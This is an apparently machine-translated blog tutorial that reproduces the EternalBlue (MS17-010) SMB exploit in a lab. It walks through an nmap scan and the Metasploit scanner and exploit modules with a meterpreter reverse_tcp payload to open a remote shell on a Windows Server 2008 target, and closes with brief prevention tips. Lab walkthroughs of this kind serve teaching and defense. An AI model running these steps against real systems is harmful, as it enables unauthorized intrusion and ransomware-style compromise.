当前位置:网站首页>Eternal blue bug reappears
Eternal blue bug reappears
2022-07-31 05:53:00 【not used to having you】
Foreword
Eternal Blue refers to the evening of April 14, 2017, the hacker group Shadow Brokers (Shadow Brokers) announced a large number of network attack tools, including "Eternal Blue" tools, "Eternal Blue" using Windows systemSMB vulnerabilities can obtain the highest privileges of the system.On May 12, criminals created the wantancry ransomware by transforming "Eternal Blue", UK, Russia, the entire Europe and many domestic university intranets, large enterprise intranets and government agency private networks were recruited, and were extorted to pay high ransoms to decrypt and restore files.
Principle analysis:
Use the scanning module and attack module in ms17-010 to firstly judge whether there is an EternalBlue vulnerability through the scanning module, and then use the attack module to attack.
Tips: The following is the text of this article, and the following cases are for reference
I. Preliminary preparations
1. Install the kali system in the virtual machine.(host ip is192.168.85.131)
2. Windows sever 2008 r2 is installed.(target machine ip is 192.168.132)
3. Make sure that port 445 has been opened on the target machine.
Second, detailed steps
1. Scanning module
a. Use nmap -Pn 192.168.85.132 to scan whether the target machine has port 445 open.

b. After confirming that it is turned on, enter use auxiliary/scanner/smb/smb_version to enter scan mode, and then show options

c. Now see Required, if there is yes, you need to set it yourself.

d.RHOSTS represents the target machine, enter set RHOSTS 192.168.85.132, and then show options to see if it is set.

e. Enter run to scan to see if there is an Eternal Blue vulnerability.(The following display indicates that the host is vulnerable)

2. Attack module
a. Enter use exploit/windows/smb/ms17_010_eternalblue to open the attack module.(Specially note that the previous ones have been changed, the auxiliary scanning module is above, and the exploit attack module is below)

b. Then show options to view the settings inside. Where there is yes, it means that we need to set it.

c. Carefully observe, there are two modules on it:
Module options (exploit/windows/smb/ms17_010_eternalblue)
Payload options (windows/x64/meterpreter/reverse_tcp)
d. We need to set the above RHOSTS, set it as the ip192.168.85.132 of the target machine, and then pass the
use windows/x64/meterpreter/reverse_tcp Convert to the second module to modify the LHOST host ip and LPORT port, do not conflict with the local port port.Then show options to see the results.

e. Finally, convert the payload into an exploit attack module through use exploit/windows/smb/ms17_010_eternalblue.Finally, enter exploit to attack.

f. The appearance of meterpreter proves that you have successfully practiced the EternalBlue vulnerability.Enter sysinfo to view the target host information.

3. Supplementary knowledge
a. Enter info after entering the attack module to view the vulnerability information.

b. Enter show targets to view the attackable system platforms.

Preventing the EternalBlue vulnerability
1. Update the latest system patch
2. Use cloud services to back up data
3. Blocking ports
边栏推荐
- The process and specific code of sending SMS verification code using flask framework
- 1D, 2D, 3D convolution operations in pytorch
- Install mysqldb in mac10.14
- What is an EVM Compatible Chain?
- feign调用不通问题,JSON parse error Illegal character ((CTRL-CHAR, code 31)) only regular white space (r
- (Crypto必备干货)详细分析目前NFT的几大交易市场
- 阿里一面,说说你知道消息中间件的应用场景有哪些?
- [Elastic-Job source code analysis] - job listener
- 闭包(五)----一个常见的循环
- wpf ScrowViewer水平滚动
猜你喜欢
随机推荐
什么是EVM兼容链?
win11中利用IIS10搭建asp网站
vulhub靶场学习日记hackme2
DeFi 项目中的治理Token
Build vulhub vulnerability shooting range on kali
10 【高度塌陷与BFC】
11 【定位】
初涉C语言
02 【el和data的两种写法 MVVM模型】
leetcode-1833. 雪糕的最大数量(排序+贪心)
数字孪生将成为进入“元宇宙”一项重要的途径
Qt Creator + CMake 运行调试总会自动 build 所有目标
MySQL高级语句(一)
实验8 DNS解析
Error: Cannot find module 'D:\Application\nodejs\node_modules\npm\bin\npm-cli.js'
feign调用不通问题,JSON parse error Illegal character ((CTRL-CHAR, code 31)) only regular white space (r
C语言文件读、写、定位函数
GUCCI、LV等奢侈品巨头如何布局元宇宙的,其他品牌应该跟上吗?
梳理一下自己常用的快捷键
(Crypto essential dry goods) Detailed analysis of the current NFT trading markets









